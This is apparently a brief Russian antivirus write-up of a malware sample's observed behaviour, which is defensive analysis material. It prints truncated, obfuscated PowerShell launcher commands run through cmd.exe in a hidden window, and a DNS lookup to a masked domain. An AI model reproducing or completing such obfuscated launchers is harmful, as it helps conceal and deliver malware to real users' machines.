Техническая информация
- '<SYSTEM32>\cmd.exe' /c "powershell $lcalaw='^ess';$ahxup='^ect';$zikbuc='^loa';$urihy='^roc';$june='^tmp';$jhylmo='^e'')';$ankyfvi='^ath';$iqep='^ath';$kehhy='^y B';$fygji='^men';$qozesr='^lic';$aqbyze='^.ex';$ad...
- DNS ASK lt##.#ibermen.pl
- '<SYSTEM32>\cmd.exe' /c "powershell $lcalaw='^ess';$ahxup='^ect';$zikbuc='^loa';$urihy='^roc';$june='^tmp';$jhylmo='^e'')';$ankyfvi='^ath';$iqep='^ath';$kehhy='^y B';$fygji='^men';$qozesr='^lic';$aqbyze='^.ex';$ad...' (со скрытым окном)